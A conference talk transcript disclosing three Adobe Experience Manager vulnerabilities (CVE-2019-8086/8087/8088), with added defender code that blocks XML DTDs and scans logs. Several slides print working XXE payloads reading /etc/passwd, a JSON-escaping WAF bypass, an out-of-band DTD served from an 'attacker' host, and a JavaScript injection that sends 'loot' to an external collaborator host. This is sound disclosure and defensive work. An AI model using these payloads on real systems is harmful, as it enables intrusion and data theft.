
A Hacker's perspective on AEM applications security

Mikhail Egorov
September 30, 2020


Adobe Experience Manager (AEM) is a comprehensive content management solution for building websites and managing marketing content and assets. I started to look into AEM security back in 2015. Since then I have discovered and reported several server-side vulnerabilities and developed a toolset for AEM hacking to automate security testing of AEM web applications.

In 2019 I reported one code injection and three XML external entity (XXE) vulnerabilities to Adobe PSIRT. They are known as CVE-2019-8086, CVE-2019-8087 and CVE-2019-8088. These vulnerabilities allow anonymous attackers to compromise an AEM web application.

In the talk, I will disclose details of discovered vulnerabilities and exploitation techniques.


Transcript

  1. EUROPE'S LEADING AEM DEVELOPER CONFERENCE, 28th – 30th SEPTEMBER 2020
     A Hacker's perspective on AEM applications security
     Mikhail Egorov, Security researcher & bug hunter

  2. Intro

  3. whoami
     ▪ Security researcher & full-time bug hunter
     ▪ https://bugcrowd.com/0ang3el
     ▪ https://hackerone.com/0ang3el
     ▪ Conference speaker
     ▪ https://www.slideshare.net/0ang3el
     ▪ https://speakerdeck.com/0ang3el

  4. whoami
     ▪ Toolset for AEM hacking
     ▪ https://github.com/0ang3el/aem-hacker

  5. APSB19-48

  6. APSB19-48
     ▪ http://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
     ▪ CVE-2019-8086 / XML eXternal Entity Injection
     ▪ CVE-2019-8087 / XML eXternal Entity Injection
     ▪ CVE-2019-8088 / JavaScript Code Injection

  7. XML eXternal Entity (XXE) attacks
     ▪ Do we see the parsed XML?
     ▪ What's allowed by the XML parser?
     ▪ General external entities
     ▪ Parameter external entities
     ▪ External DTD loading

  8. XML eXternal Entity (XXE) attacks
     Input (general external entity):
         <?xml version="1.0" encoding="UTF-8"?>
         <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
         <foo>&xxe;</foo>

     Parsed result:
         <foo>root:x:0:0:root:/root:/bin/bash
         daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
         bin:x:2:2:bin:/bin:/usr/sbin/nologin
         sys:x:3:3:sys:/dev:/usr/sbin/nologin
         sync:x:4:65534:sync:/bin:/bin/sync
         …
         </foo>

  9. XML eXternal Entity (XXE) attacks
     Parameter external entity:
         <?xml version="1.0" encoding="UTF-8"?>
         <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:4503"> %xxe; ]>
         <foo></foo>

  10. XML eXternal Entity (XXE) attacks
      External DTD loading:
         <?xml version="1.0" encoding="UTF-8"?>
         <!DOCTYPE foo SYSTEM "http://127.0.0.1:4503" []>
         <foo></foo>

  11. CVE-2019-8086
      ▪ GuideInternalSubmitServlet
         @Service({Servlet.class})
         @Properties({
             @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
             @Property(name = "sling.servlet.methods", value = {"POST"}),
             @Property(name = "sling.servlet.selectors", value = {"af.internalsubmit"})
         })
         public class GuideInternalSubmitServlet …

  12. CVE-2019-8086

  13. CVE-2019-8086

  14. CVE-2019-8086
      ▪ XXE payload
         <?xml version="1.0" encoding="utf-8"?>
         <!DOCTYPE afData [ <!ENTITY a SYSTEM "file:///etc/passwd"> ]>
         <afData>&a;</afData>

  15. CVE-2019-8086

  16. CVE-2019-8086
      ▪ Exploitation hints
      ▪ We can JSON-encode the XXE payload to bypass a WAF
      ▪ In Java we can list directory content
      ▪ /proc/self/cwd
  17. CVE-2019-8086
      ▪ JSON-encoding
         data = '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE afData [<!ENTITY a SYSTEM "file:///etc/passwd">]><afData>&a;</afData>'
         result = ""
         # escape every character as a JSON \u00XX sequence
         for c in data:
             result = result + "\\u00%02x" % ord(c)
         print(result)
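Slides 8 to 10 show the three XXE shapes the talk relies on (internal general entity, parameter entity, external DTD subset) and slide 17 shows why a filter that matches raw request bytes misses a JSON-escaped payload. The following Python is an added defender-side example, not code from the talk or from the aem-hacker toolset: it gates untrusted XML on the presence of a DOCTYPE (the same effect as the Java parser feature `disallow-doctype-decl`, which all three shapes need), and it decodes the JSON body before inspecting it so the check sees the same bytes the XML parser will. The field name `data`, the request body layout and the benign document are constructed assumptions, not AEM's real submission format.

```python
import json
import re
import xml.etree.ElementTree as ET

# Every XXE shape on slides 8-10 and 28-29 needs a DOCTYPE to declare its
# entities, so refusing the declaration up front closes all of them.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


def contains_doctype(xml_text: str) -> bool:
    """True if the document carries a DOCTYPE (and may therefore declare entities)."""
    return DOCTYPE_RE.search(xml_text) is not None


def parse_untrusted_xml(xml_text: str) -> ET.Element:
    """Parse XML from an untrusted source, refusing any document with a DTD."""
    if contains_doctype(xml_text):
        raise ValueError("DOCTYPE declarations are not accepted from untrusted input")
    return ET.fromstring(xml_text)


def decode_json_field(raw_json_body: str, field: str) -> str:
    """Return the decoded string carried in `field` of a JSON request body.

    json.loads turns every \\u00XX escape back into the character it hides,
    so an inspection of the result sees what the XML parser will see.
    """
    body = json.loads(raw_json_body)
    value = body.get(field)
    if not isinstance(value, str):
        raise ValueError(f"field {field!r} is missing or not a string")
    return value


def inspect_submission(raw_json_body: str, field: str = "data") -> dict:
    """Compare a raw-bytes check with a decode-then-inspect check."""
    xml_text = decode_json_field(raw_json_body, field)
    return {
        "raw_body_flagged": contains_doctype(raw_json_body),  # what a byte-matching WAF sees
        "decoded_flagged": contains_doctype(xml_text),        # what the parser will see
    }


def json_encode_like_slide(data: str) -> str:
    """The \\u00XX escaping from slide 17, used here only to build the sample body."""
    return "".join("\\u00%02x" % ord(c) for c in data)


# Constructed sample: the slide-14 payload, escaped as on slide 17 and wrapped
# in an assumed JSON body; the "data" field name is not AEM's real parameter.
XXE_PAYLOAD = ('<?xml version="1.0" encoding="utf-8"?><!DOCTYPE afData '
               '[<!ENTITY a SYSTEM "file:///etc/passwd">]><afData>&a;</afData>')
SAMPLE_BODY = '{"data": "' + json_encode_like_slide(XXE_PAYLOAD) + '"}'
BENIGN_XML = '<afData><name>Ada</name></afData>'


if __name__ == "__main__":
    print(inspect_submission(SAMPLE_BODY))
    try:
        parse_untrusted_xml(XXE_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
    print(parse_untrusted_xml(BENIGN_XML).find("name").text)
```

The DOCTYPE gate is deliberately strict: a `<!DOCTYPE` inside a comment or CDATA section is also rejected, which is the right trade-off for input that a legitimate form submission never needs a DTD for. The decode step generalizes beyond the slide's `\u00XX` trick to any JSON string escaping, because `json.loads` normalizes all of them before the check runs.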
  18. CVE-2019-8086

  19. CVE-2019-8086
      ▪ XXE payload
         <?xml version="1.0" encoding="utf-8"?>
         <!DOCTYPE afData [ <!ENTITY a SYSTEM "file:///etc"> ]>
         <afData>&a;</afData>

  20. CVE-2019-8086

  21. CVE-2019-8086
      ▪ Exploitation requirements
      ▪ There should be a node with fd/af/components/guideContainer resource type
      ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
      ▪ Attacker should have jcr:write access somewhere
      ▪ /content/usergenerated/etc/commerce/smartlists/

  22. CVE-2019-8086
      ▪ Exploitation requirements
      ▪ Doesn't work equally on different AEM versions
      ▪ Only blind SSRF for some versions
         <?xml version="1.0" encoding="utf-8"?>
         <!DOCTYPE afData SYSTEM "http://localhost:4503" []>
         <afData></afData>

  23. CVE-2019-8087
      ▪ WSDLInvokerServlet
         @Service({Servlet.class})
         @Properties({
             @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
             @Property(name = "sling.servlet.selectors", value = {"af.wsdl"}),
             @Property(name = "sling.servlet.methods", value = {"POST"})
         })
         public class WSDLInvokerServlet …

  24. CVE-2019-8087

  25. CVE-2019-8087

  26. CVE-2019-8087
      ▪ WSDL example
      ▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

  27. CVE-2019-8087

  28. CVE-2019-8087
      ▪ Malicious xxe.wsdl
         <?xml version="1.0"?>
         <!DOCTYPE definitions [
           <!ENTITY % dtd SYSTEM "http://attacker:1337/loot.dtd">
           %dtd;
           %param1;
         ]>
         <definitions name="StockQuote" …
           <operation name="GetLastTradePrice">
             <soap:operation soapAction="&internal;"/>
           …

  29. CVE-2019-8087
      ▪ Malicious loot.dtd
         <!ENTITY % payload SYSTEM "file:///etc/passwd">
         <!ENTITY % param1 "<!ENTITY internal '%payload;'>">

  30. CVE-2019-8087

  31. CVE-2019-8087
      ▪ Exploitation requirements
      ▪ There should be a node with fd/af/components/guideContainer resource type
      ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
      ▪ Attacker should have jcr:write access somewhere
      ▪ /content/usergenerated/etc/commerce/smartlists/

  32. CVE-2019-8087
      ▪ Exploitation requirements
      ▪ Doesn't work equally on different AEM versions
      ▪ On some AEM versions WSDLInvokerServlet is not present

  33. CVE-2019-8088
      ▪ GuideSubmitServlet
         @Service({Servlet.class})
         @Properties({
             @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
             @Property(name = "sling.servlet.methods", value = {"POST"}),
             @Property(name = "sling.servlet.selectors", value = {"af.submit", "af.agreement", "af.signSubmit"})
         })
         public class GuideSubmitServlet extends SlingAllMethodsServlet { …

  34. CVE-2019-8088

  35. CVE-2019-8088

  36. CVE-2019-8088

  37. CVE-2019-8088

  38. CVE-2019-8088

  39. CVE-2019-8088
      ▪ Sandboxed Rhino engine on some AEM versions
      ▪ No RCE
      ▪ Sandbox allows network interactions
      ▪ SSRF w/ ability to see the response

  40. CVE-2019-8088
      ▪ JS payload
         ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net');//

  41. CVE-2019-8088

  42. CVE-2019-8088

  43. CVE-2019-8088
      ▪ JS payload
         ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net',function(data){jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net',{loot:data})});//

  44. CVE-2019-8088

  45. CVE-2019-8088

  46. CVE-2019-8088
      ▪ Exploitation requirements
      ▪ There should be a node with fd/af/components/guideContainer resource type
      ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
      ▪ Attacker should have jcr:write access somewhere
      ▪ /content/usergenerated/etc/commerce/smartlists/

  47. CVE-2019-8088
      ▪ Exploitation requirements
      ▪ Doesn't work equally on different AEM versions
      ▪ RCE or SSRF
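All three servlets (slides 11, 23 and 33) are reached the same way: a POST to a resource whose `sling:resourceType` is `fd/af/components/guideContainer`, with one of the registered selectors in the request path, and the exploitation-requirement slides name `/content/usergenerated/` as the subtree where an anonymous user may be able to create such a node. That gives a defender a concrete thing to look for in web-server logs while patches from APSB19-48 roll out. The following Python is an added detection example, not code from the talk or the aem-hacker toolset: it decomposes request paths the way Sling does (an approximation), maps the selectors from the slides to their CVE, and ranks posts under the user-writable subtree higher. The log lines are constructed samples in a common Apache/dispatcher access-log layout, which is an assumption; AEM's own request.log uses a different format.

```python
import re

# Selector strings registered by the servlets on slides 11, 23 and 33,
# mapped to the APSB19-48 entry they belong to.
VULNERABLE_SELECTORS = {
    "af.internalsubmit": ("CVE-2019-8086", "GuideInternalSubmitServlet"),
    "af.wsdl":           ("CVE-2019-8087", "WSDLInvokerServlet"),
    "af.submit":         ("CVE-2019-8088", "GuideSubmitServlet"),
    "af.agreement":      ("CVE-2019-8088", "GuideSubmitServlet"),
    "af.signSubmit":     ("CVE-2019-8088", "GuideSubmitServlet"),
}

# Subtree that slides 21, 31 and 46 name as writable by low-privileged users.
USER_WRITABLE_PREFIX = "/content/usergenerated/"

# Constructed sample lines (assumed Apache/dispatcher access-log layout).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Sep/2020:10:00:01 +0000] "POST /content/usergenerated/etc/commerce/smartlists/x.af.internalsubmit.jsp HTTP/1.1" 200 512
10.0.0.6 - - [30/Sep/2020:10:00:02 +0000] "POST /content/forms/af/contact.af.submit.jsp HTTP/1.1" 200 120
10.0.0.7 - - [30/Sep/2020:10:00:03 +0000] "POST /content/usergenerated/etc/commerce/smartlists/y.af.wsdl.jsp?x=1 HTTP/1.1" 500 0
10.0.0.8 - - [30/Sep/2020:10:00:04 +0000] "GET /content/geometrixx/en.html HTTP/1.1" 200 9000
10.0.0.9 - - [30/Sep/2020:10:00:05 +0000] "POST /content/usergenerated/etc/commerce/smartlists/z.af.signSubmit.jsp HTTP/1.1" 200 80
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def split_sling_path(path):
    """Approximate Sling's request-path decomposition.

    The first path segment containing a dot carries the resource name,
    the selectors and the extension; any later segments form the suffix.
    Returns (resource_path, selectors, extension, suffix).
    """
    segments = path.split("/")
    for i, seg in enumerate(segments):
        if "." in seg:
            name, *rest = seg.split(".")
            resource = "/".join(segments[:i] + [name])
            suffix = "/" + "/".join(segments[i + 1:]) if i + 1 < len(segments) else ""
            return resource, rest[:-1], rest[-1], suffix
    return path, [], "", ""


def classify_request(line):
    """Return a finding for a POST aimed at one of the servlets, else None."""
    m = REQUEST_RE.match(line)
    if not m or m.group("method") != "POST":
        return None
    path = m.group("target").split("?", 1)[0]        # drop the query string
    resource, selectors, _ext, _suffix = split_sling_path(path)
    hit = VULNERABLE_SELECTORS.get(".".join(selectors))
    if hit is None:
        return None
    cve, servlet = hit
    # A guideContainer node under the user-writable subtree is the precondition
    # from slides 21/31/46, so posts there get the higher rank.
    severity = "high" if resource.startswith(USER_WRITABLE_PREFIX) else "review"
    return {"client": m.group("ip"), "resource": resource,
            "cve": cve, "servlet": servlet, "severity": severity}


def scan_log(text):
    """Run classify_request over every line and keep the findings."""
    return [f for f in (classify_request(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A "review" finding is not evidence of attack: forms legitimately submit through `af.submit` on authored pages under `/content`. The point of the two ranks is that the same selector on a node under `/content/usergenerated/`, where no authored form should live, is the combination the three CVEs need, and that is the one worth paging on.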
  48. APSB19-48
      ▪ Keep AEM up to date
      ▪ http://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
      ▪ Block jcr:write access for the anonymous user
      ▪ /content/usergenerated/etc/commerce/smartlists/
      ▪ Remove demo content (Geometrixx, WeRetail, …)

  49. Thank you @0ang3el